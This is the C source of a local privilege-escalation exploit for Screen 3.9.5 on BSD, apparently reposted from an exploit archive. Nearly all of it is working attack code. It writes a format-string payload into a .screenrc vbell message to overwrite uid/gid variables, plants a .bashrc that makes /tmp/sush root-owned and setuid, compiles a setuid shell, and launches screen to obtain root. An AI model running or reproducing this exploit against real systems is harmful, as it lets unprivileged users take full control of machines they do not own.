Screen 3.9.5 BSD local root exploit. Tested against OpenBSD.
8ee52045aae8ee9d02f7529addb6cb4f32eb283bdbcc2dfabb8ab07255fc01c5/****************************************************************
* *
* Screen 3.9.5 BSD local exploit *
* by IhaQueR at IRCNET *
* !only for demonstrative purposes! *
* *
****************************************************************/
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/utsname.h>
#include <pwd.h>
#include <stdlib.h>
#include <errno.h>
extern char **environ;
char* home = "/tmp/.home";
char* ev1 = "PS1=\\u@ExploitMe>";
#define SCREEN "/usr/local/bin/screen-3.9.5"
#define SHELL "/bin/sh"
#define SCREENRC ".screenrc"
#define BASHRC ".bashrc"
/* offset to the env seen from Msg() */
#define BUFOFFSET 2682
/* addr to be written (may vary)*/
#define WRITEADDR 0x3c1e4
/* some addresses grabbed from 3.9.5
OpenBSD: &real_uid, &real_gid, &eff_uid, &eff_gid
0x3c1e4 0x3c224 0x3b1b0 0x3b1a4
for finding addresses see expl.c, it may be hard...
*/
/* repeat the addr table in environ */
#define ENVREP 32
/* but write only once */
#define WREP 1
char* env[ENVREP*4 + 256];
#define TMPBUFSIZE (BUFOFFSET+1024)
int main(int argc, char** argv)
{
int i, off=0;
int writeoffs=0, bufoffset=0, padding=0, bfoff=0, byteadj=0;
int ep=0, b=0, ob=0;
unsigned vv[ENVREP+2];
unsigned char* pp;
FILE* fp;
char buf[TMPBUFSIZE];
unsigned char myhome[TMPBUFSIZE];
char screenrc[TMPBUFSIZE];
char bashrc[TMPBUFSIZE];
char pad[TMPBUFSIZE];
char buf2[TMPBUFSIZE];
if(argc != 5) {
printf("USAGE %s <write offset> <bufferoffset> <byteadj> <padding>\n", argv[0]);
return 0;
} else {
printf("Screen 3.9.5 local r00t exploit\n");
printf("by IhaQueR@IRCNET\n\n");
}
/* user supplied offsets */
writeoffs = atoi(argv[1]);
bfoff = atoi(argv[2]);
byteadj = atoi(argv[3]);
padding = atoi(argv[4]);
/* create env */
for(i=0; i<ENVREP; i++)
vv[i] = WRITEADDR + writeoffs + i%4;
vv[ENVREP] = 0;
pp = (unsigned char*) vv;
b = 0;
ob = b;
sprintf(myhome, "HOME=%s", home);
putenv(myhome);
putenv(ev1);
while(environ[ep]){
env[ep] = environ[ep];
ep++;
}
/* pad */
sprintf(pad, "%s", "PPPP");
for(i=0; i<padding; i++)
strcat(pad, "Q");
env[ep++]=pad;
while(b<ENVREP*4) {
if(pp[b] == 0) {
env[ep] = pp + ob;
ob = b+1;
ep++;
}
b++;
}
if(*(pp+ob))
env[ep++] = pp + ob;
env[ep++] = NULL;
/* create vbell string */
printf("creating magic string\n");
bzero(buf, TMPBUFSIZE);
bufoffset = BUFOFFSET + bfoff*sizeof(double);
/* consume stack arguments */
for(i=0; i<bufoffset/sizeof(double)+1; i++)
strcat(buf, "%.g");
/* finally write to adress */
sprintf(buf2, "%%dx%%n%%n%%n%%n", byteadj+16);
for(i=0;i<WREP; i++)
strcat(buf, buf2);
/* create homedir */
if(mkdir((char*)(home), 0xfff))
if(errno != EEXIST) {
printf("\nERROR: mkdir()");
return 2;
}
/* strings for .screenrc and .bashrc */
strcpy(screenrc, home);
strcat(screenrc, "/");
strcat(screenrc, SCREENRC);
strcpy(bashrc, home);
strcat(bashrc, "/");
strcat(bashrc, BASHRC);
/* create screenrc */
printf("building %s\n", screenrc);
if(fp = fopen(screenrc, "w")) {
fprintf(fp, "vbell on\n");
fprintf(fp, "vbell_msg '%s'\n", buf);
fprintf(fp, "vbellwait 3600\n");
fclose(fp);
}
else {
printf("ERROR: opening %s\n", screenrc);
return 1;
}
/* create bashrc */
printf("creating %s\n", bashrc);
snprintf(buf, TMPBUFSIZE, "echo >%s 'chown root /tmp/sush; chmod 4755 /tmp/sush'", bashrc);
system(buf);
/* create suid shell */
printf("compiling suid shell\n");
snprintf(buf, TMPBUFSIZE, "echo >/tmp/sush.c 'main(int ac, char**av){setuid(0); setgid(0); execv(\"%s\", av);}'", SHELL);
system(buf);
system("gcc /tmp/sush.c -o /tmp/sush");
/* set env and call screen */
argv[1] = NULL;
printf("press enter to start screen, then hit enter again, ctrl-g, ctrl-c for suid shell at /tmp/sush and root uid");
getchar();
execve(SCREEN, argv, env);
}
/* www.hack.co.za [8 September 2000]*/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed